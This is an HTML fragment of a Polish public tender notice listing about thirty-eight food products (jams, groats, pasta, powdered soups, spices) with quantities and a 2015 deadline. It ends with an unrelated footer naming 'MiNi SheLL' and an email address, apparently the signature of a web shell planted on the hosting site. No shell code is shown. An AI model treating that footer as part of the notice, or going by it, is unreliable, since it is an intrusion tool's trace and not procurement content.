<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)dżem owocowy	 				
ilość: 660 kg 
2)marmolada owocowa 				
ilość: 660 kg 
3)chrzan tarty 					
ilość: 900 kg
4)sałatka szwedzka 					
ilość: 1740 l 
5)sałatka wielowarzywna 				
ilość: 1740 l
6)cukier biały 					
ilość: 2500 kg
7)kasza jęczmienna 					
ilość: 2500 kg
8)ryż biały 						
ilość: 2500 kg
9)mąka pszenna 					
ilość: 1100 kg
10)płatki kukurydziane 					
ilość: 600 kg
11)kasza manna 					
ilość: 600 kg
12)makarony różne 					
ilość: 3800 kg
13)barszcz czerwony w proszku 				
ilość: 270 kg
14)zupa grzybowa w proszku 				
ilość: 270 kg
15)zupa jarzynowa w proszku 				
ilość: 270 kg
16)zupa ogonowa w proszku 				
ilość: 270 kg
17)zupa pieczarkowa w proszku 				
ilość: 270 kg
18)zupa kalafiorowa w proszku 				
ilość: 270 kg
19)żurek śląski w proszku 				
ilość: 270 kg
20)sos boloński w proszku 				
ilość: 160 kg
21)sos myśliwski w proszku 				
ilość: 160 kg 
22)sos grzybowy w proszku 				
ilość: 160 kg
23)pieprz czarny mielony 				
ilość: 40 kg
24)kminek 						
ilość: 40 kg
25)majeranek 				
ilość: 40 kg
26)ziele angielskie 					
ilość: 40 kg
27)liść laurowy 					
ilość: 40 kg
28)sól 						
ilość: 800 kg
29)ocet spożywczy 					
ilość: 400 l
30)przyprawa do zup w płynie 				
ilość: 400 l
31)herbata granulowana 				
ilość: 600 kg
32)majonez 					
ilość: 900 kg
33)musztarda 					
ilość: 900 kg
34)koncentrat pomidorowy 				
ilość: 900 kg
35)przyprawa do zup w proszku 				
ilość: 400 kg
36)fasola jaś 					
ilość: 900 kg
37)groch cały 					
ilość: 900 kg
38)kostka sojowa 					
ilość: 600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com